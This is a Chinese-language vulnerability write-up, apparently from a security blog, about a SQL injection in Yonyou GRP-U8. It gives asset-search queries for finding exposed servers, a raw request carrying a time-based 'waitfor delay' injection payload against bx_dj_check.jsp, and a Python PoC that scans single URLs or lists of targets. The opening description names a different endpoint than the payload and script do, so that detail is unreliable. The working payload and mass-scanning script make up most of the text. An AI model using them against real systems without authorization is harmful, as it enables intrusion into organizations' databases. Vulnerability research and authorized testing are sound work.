声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
用友GRP-U8是一款企业管理软件,其系统dialog_moreUser_check.jsp
接口存在SQL注入漏洞。
漏洞复现
1)资产测绘
fofa:app="用友-GRP-U8"
hunter:app.name="用友-GRP-U8"
选秀环节!
2)构造数据包
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
burp!启动!
延迟响应了5041毫秒,存在sql注入~
代码解释:
waitfor delay '0:0:5'
这是一个SQL Server特有的命令,它使当前SQL语句暂停执行5秒。通过检查响应时间来验证是否存在SQL注入漏洞。如果服务器响应时间明显增加(在这个例子中是5秒),这可能表明注入的SQL命令被执行了,从而验证了存在SQL注入漏洞。
测试工具
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning
# 定义颜色代码,用于控制台输出
RED = '\033[91m'
RESET = '\033[0m'
# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def check_vulnerability(url):
"""
检测指定URL是否存在SQL注入漏洞。
参数:
- url: 目标网站的URL地址
"""
try:
# 构造攻击URL,尝试触发SQL注入延迟
attack_url = url.rstrip('/') + "/u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'--"
# 记录请求开始时间
start_time = time.time()
# 发送GET请求,不验证SSL证书,设置超时时间
response = requests.get(attack_url, verify=False, timeout=10)
# 计算请求耗时
elapsed_time = time.time() - start_time
# 如果请求耗时在5到10秒之间,可能存在SQL注入漏洞
if 5 < elapsed_time < 10:
print(f"{RED}URL [{url}] 可能存在yonyou-grp-u8-bx_dj_check-sql-injection漏洞{RESET}")
else:
print(f"URL [{url}] 不存在漏洞")
except requests.exceptions.Timeout:
# 请求超时,可能存在漏洞
print(f"URL [{url}] 请求超时,可能存在漏洞")
except requests.RequestException as e:
# 其他请求异常
print(f"URL [{url}] 请求失败: {e}")
def main():
"""
主函数,解析命令行参数并执行漏洞检测。
"""
parser = argparse.ArgumentParser(description='检测目标地址是否存在yonyou-grp-u8-sql-injection漏洞')
parser.add_argument('-u', '--url', help='指定目标地址')
parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
# 解析命令行参数
args = parser.parse_args()
# 如果提供了URL参数
if args.url:
# 确保URL以http或https开头
if not args.url.startswith(("http://", "https://")):
args.url = "http://" + args.url
check_vulnerability(args.url)
# 如果提供了文件参数
elif args.file:
# 读取文件中的URL列表
with open(args.file, 'r') as file:
urls = file.read().splitlines()
for url in urls:
# 确保URL以http或https开头
if not url.startswith(("http://", "https://")):
url = "http://" + url
check_vulnerability(url)
if __name__ == '__main__':
main()
运行截图